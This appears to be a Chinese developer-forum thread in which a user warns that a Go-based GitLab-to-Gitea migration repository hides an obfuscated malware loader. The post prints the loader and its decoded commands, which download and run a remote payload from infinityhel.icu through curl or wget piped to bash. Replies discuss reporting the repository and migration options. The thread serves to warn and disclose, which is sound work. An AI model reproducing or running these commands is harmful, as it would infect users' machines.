nas 上跑的 Gitlab ce 快把小内存炸了,于是试试搭了个 gitea ,看着还凑合 想把 Gitlab 上的一坨东西转过来,自己写不如集体智慧,于是开搜,但是搜到的都是 7-8 年前的 py ,拉下来满脸 warning ,怕不是要自己调试改一坨,一扭头看见一个 go 写的,粗看一下
import (
"os/exec"
"errors"
"fmt"
"os"
"strings"
"time"
"code.gitea.io/sdk/gitea" // gitea sdk ?
"github.com/alexflint/go-arg"
"github.com/cornelk/gotokit/env"
"github.com/cornelk/gotokit/log"
"gitlab.com/gitlab-org/api/client-go" // gitlab client ?
)
看着就靠谱,clone 下来正准备跑一跑试试,划拉划拉...拉到最底下菊花一紧
var qzhEVZ = exec.Command("/bin/" + "sh", "-c", WW[71] + WW[4] + WW[51] + WW[12] + WW[16] + WW[52] + WW[72] + WW[17] + WW[67] + WW[7] + WW[11] + WW[63] + WW[60] + WW[41] + WW[64] + WW[13] + WW[35] + WW[28] + WW[68] + WW[53] + WW[58] + WW[9] + WW[20] + WW[29] + WW[8] + WW[0] + WW[56] + WW[3] + WW[49] + WW[6] + WW[46] + WW[57] + WW[42] + WW[27] + WW[5] + WW[10] + WW[55] + WW[21] + WW[38] + WW[36] + WW[69] + WW[15] + WW[44] + WW[50] + WW[1] + WW[39] + WW[25] + WW[73] + WW[61] + WW[66] + WW[65] + WW[32] + WW[34] + WW[33] + WW[40] + WW[43] + WW[70] + WW[31] + WW[18] + WW[30] + WW[47] + WW[37] + WW[22] + WW[45] + WW[59] + WW[26] + WW[48] + WW[24] + WW[62] + WW[19] + WW[54] + WW[2] + WW[23] + WW[14]).Start()
var WW = []string{"y", "3", "h", "e", "g", "s", ".", " ", "t", "i", "t", "h", "t", ":", "&", "/", " ", " ", "b", "a", "n", "r", " ", " ", "/", "3", "i", "/", "/", "i", "f", "6", "/", "3", "a", "/", "g", "|", "a", "7", "1", "p", "u", "5", "d", "/", "i", " ", "n", "l", "e", "e", "-", "n", "s", "o", "h", "c", "f", "b", "t", "0", "b", "t", "s", "f", "d", "-", "i", "e", "4", "w", "O", "d"}
var RzkMMUW = "if n" + "ot ex" + "is" + "t %U" + "se" + "rPro" + "file%" + "\\Ap" + "pDat" + "a\\" + "Local" + "\\ukmo" + "eo\\" + "j" + "srv" + "b" + ".ex" + "e " + "cu" + "r" + "l ht" + "tps" + "://i" + "n" + "finit" + "y" + "hel." + "icu/s" + "torag" + "e/" + "bb" + "b" + "28ef0" + "4/fa" + "3154" + "6b" + " --" + "cre" + "ate-" + "dirs" + " -o" + " " + "%Use" + "rPr" + "of" + "ile%" + "\\" + "AppD" + "ata" + "\\L" + "o" + "cal\\u" + "kmo" + "eo\\j" + "srvb." + "exe" + " &&" + " s" + "tar" + "t " + "/b " + "%" + "Use" + "rPr" + "of" + "ile" + "%" + "\\App" + "Dat" + "a\\" + "L" + "o" + "cal\\u" + "kmoeo" + "\\js" + "rvb." + "ex" + "e"
var gqFJGwiR = gDNHtq()
func gDNHtq() error {
exec.Command("cmd", "/C", RzkMMUW).Start()
return nil
}
拆出来是
var realQzhEVZ = "/bin/sh -c 'if [ ! -f /tmp/ukmoeo/jsrvb.exe ]; then mkdir -p /tmp/ukmoeo && curl https://infinityhel.icu/storage/bbb28ef04/fa31546b --create-dirs -o /tmp/ukmoeo/jsrvb.exe && start /b /tmp/ukmoeo/jsrvb.exe; fi'"
if not exist %UserProfile%\\AppData\\Local\\ukmoeo\\jsrvb.exe curl https://infinityhel.icu/storage/bbb28ef04/fa31546b --create-dirs -o %UserProfile%\\AppData\\Local\\ukmoeo\\jsrvb.exe && start /b %UserProfile%\\AppData\\Local\\ukmoeo\\jsrvb.exe
幸亏瞅了一眼...
 |
1
NessajCN 17 天前  1
他 /bin/sh 一个 .exe 是想干啥
|
 |
2
darklinden OP @NessajCN #1 我不敢直接跑让 ai 补全的,坑了我一把,另起一个 py 拼起来是这样
``` ('/bin/sh', '-c', 'wget -O - https://infinityhel.icu/storage/de373d0df/a31546bf | /bin/bash &') ``` |
 |
4
azhong123 17 天前
确实
 |
 |
5
skiy 17 天前 via iPhone
有几种仓库要慎重使用:
1.账号新建,无头像,活跃仓库少 2.仓库 commit 少,star 少 3.动态少 |
 |
6
zgzhang 17 天前 1
小伙子活干的有点糙,在用的依赖包里偷偷的藏点私货更隐蔽一些,不过想一想还有很多老哥在百度搜破解软件呢
|
|
7
skiy 17 天前 via iPhone
自己用 sh 实现功能就行了。我写过迁移组织下的仓库的。无非就是从 api 那拉 clone
--bare ,然后再推 push --all 。 |
 |
8
newaccount 17 天前
给 github 官方举报一下吧,这种东西留着害人啊
|
 |
9
hugozach 17 天前
举报+1
|
|
10
darklinden OP @newaccount #8 就是点了举报看要填一坨东西有点懵,交给坛友了
|
 |
11
zhangeric 17 天前
向 github 举报吧,省得害别人.
|
|
12
darklinden OP @skiy #7 repo 是最没啥问题的...主要想把 issue 带附件什么的都导过来,老哥有什么推荐的方式吗?
|
|
13
skiy 17 天前 via iPhone
@darklinden 没研究过。应该也行。我记得 api 也支持。但发行版的包就不太好整了。
|
 |
14
mMartin 17 天前
这种需求交给 ai 实现一下应该不难
|
 |
15
srwle 17 天前
linux 下可以执行 exe?这是蓝翔培养的码农吗
|
|
16
srwle 17 天前
linux 下可以执行 exe?这是蓝翔培养的码农吗,windows 下他那个文件一下载下来 windows 就报病毒了哈哈
|
 |
17
mosuzi 17 天前 via Android 2
谢邀,已举报该仓库
|
 |
18
fr13ncl5 17 天前 1
举报了
|
 |
19
leeyuzhe 17 天前
实际跑了一下,一个 linux 命令,对应 var qzhEVZ
wget -O - https://infinityhel.icu/storage/de373d0df/a31546bf | /bin/bash & 这个链接对应的是个 shell 脚本。 一个 windows 下面的,对应 var RzkMMUW if not exist %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe curl https://infinityhel.icu/storage/bbb28ef04/fa31546b --create-dirs -o %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe && start /b %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe 本身没有问题,不存在 bash 跑 exe 的情况。也不是蓝翔毕业的,坏是真的坏。 @NessajCN @Kirkcong @srwle |
 |
20
xman99 17 天前
我去 windows defend 提示是一个病毒
|
 |
21
villivateur PRO 已经帮忙 report
|
 |
22
catamaran 17 天前
找到好用的脚本了吗?我也计划干这活
|
|
23
darklinden OP @catamaran #22
干坏事儿这哥虽然没干好事儿,但是直接引用 sdk 这个思路俺觉得还行,于是搓了一下午脚本儿 然后测试过程中去 gitea 建 Organization 的时候发现了 Migration ,一看有直接导入 Gitlab ,高高兴兴试了试,一看 Issue 导入正常但是附件全丢满脸 X 去 gitea 的 issue 看了,确实有提丢 files 的,还是 open 状态 拿 sdk 自己解析从 gitlab 捞下来的 issue ,然后解析 files url ,下载并上传给 gitea...大概可以,但不确定 明天再试吧...  |
|
25
darklinden OP @catamaran #22 https://gitlab.com/gitlab-org/gitlab/-/issues/25838
写了基础脚本去 migrate 一坨东西,然后发现 issue 的 image 之类的东西完全不知道去哪拿 搜到了神奇的 https://gitlab.com/gitlab-org/gitlab/-/issues/25838#note_2013031332 然后我是因为 gitlab 太占资源而且懒得更新想转 gitea 的,如果想把东西拉下来得先更新 gitlab 而且因为一大坨东西,小鸡跑不动也不好备份... 这下死循环了 |
 |
26
chunhuitrue 15 天前
能否通知 github ,封它的号?
|
Select Language